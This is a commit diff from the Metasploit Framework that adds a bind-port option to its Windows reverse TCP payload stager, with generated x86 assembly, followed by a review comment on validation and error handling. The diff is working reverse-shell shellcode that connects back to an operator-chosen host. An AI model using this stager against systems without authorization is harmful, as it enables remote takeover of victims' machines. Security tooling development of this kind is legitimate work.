Land #9335, Added socket bind port option for reverse tcp payload.

Merge branch 'land-9335' into upstream-master
4.x 4.16.33
bwatters-r7 2018-01-24 11:50:10 -06:00 committed by Jeffrey Martin
parent b515a582f0
commit af0c58c2ae
No known key found for this signature in database
GPG Key ID: 0CD9BBC2AF15F171
1 changed files with 40 additions and 0 deletions


@ -22,6 +22,14 @@ module Payload::Windows::ReverseTcp
include Msf::Payload::Windows::BlockApi include Msf::Payload::Windows::BlockApi
include Msf::Payload::Windows::Exitfunk include Msf::Payload::Windows::Exitfunk
#
# Register reverse tcp specific options
#
def initialize(*args)
super
register_advanced_options([ OptString.new('PayloadBindPort', [false, 'Port to bind reverse tcp socket to on target system.']) ], self.class)
end
# #
# Generate the first stage # Generate the first stage
# #
@ -31,6 +39,7 @@ module Payload::Windows::ReverseTcp
port: ds['LPORT'], port: ds['LPORT'],
host: ds['LHOST'], host: ds['LHOST'],
retry_count: ds['ReverseConnectRetries'], retry_count: ds['ReverseConnectRetries'],
bind_port: ds['PayloadBindPort'],
reliable: false reliable: false
} }
@ -103,6 +112,9 @@ module Payload::Windows::ReverseTcp
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
addr_fam = 2
sockaddr_size = 16
asm = %Q^ asm = %Q^
; Input: EBP must be the address of 'api_call'. ; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server ; Output: EDI will be the socket for the connection to the server
@ -141,7 +153,35 @@ module Payload::Windows::ReverseTcp
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this xchg edi, eax ; save the socket for later, don't care about the value of eax after this
^
# Check if a bind port was specified
if opts[:bind_port]
bind_port = opts[:bind_port]
encoded_bind_port = "0x%.8x" % [bind_port.to_i,2].pack("vn").unpack("N").first
asm << %Q^
xor eax, eax
push 11
pop ecx
push_0_loop:
push eax ; if we succeed, eax will be zero, push it enough times
; to cater for both IPv4 and IPv6
loop push_0_loop
; bind to 0.0.0.0/[::], pushed above
push #{encoded_bind_port} ; family AF_INET and port number
mov esi, esp ; save a pointer to sockaddr_in struct
push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used)
push esi ; pointer to the sockaddr_in struct
push edi ; socket
push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
call ebp ; bind( s, &sockaddr_in, 16 );
push #{encoded_host} ; host in little-endian format
push #{encoded_port} ; family AF_INET and port number
mov esi, esp
^
end
asm << %Q^
try_connect: try_connect:
push 16 ; length of the sockaddr struct push 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct push esi ; pointer to the sockaddr struct
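Review bot: `PayloadBindPort` is registered as an `OptString` in the first hunk but is consumed with `.to_i` and packed as a 16-bit value here, so a non-numeric or out-of-range setting (e.g. `70000`) is silently coerced to `0` or truncated instead of being rejected before the stage is generated; `OptPort.new('PayloadBindPort', [false, 'Port to bind reverse tcp socket to on target system.'])` would let the framework validate the range, and presumably would also stop an empty string (truthy in Ruby, so it passes `if opts[:bind_port]`) from producing a bind to port 0. The return value of `bind` is never tested, so if the port is unavailable on the target the stage falls through and `connect` runs from an ephemeral port with no indication to the operator; if that fallback is intended it deserves a comment such as `; bind failure is ignored: connect() below falls back to an ephemeral port`. The comment on `push eax` ("if we succeed, eax will be zero") looks copied from a call-result path — here eax was explicitly cleared by `xor eax, eax` two lines above, so `; eax was cleared above; push 44 zero bytes so the sockaddr covers IPv4 or IPv6` would be accurate. The enclosing stage-generation method starts before the hunk and its connect loop continues after it.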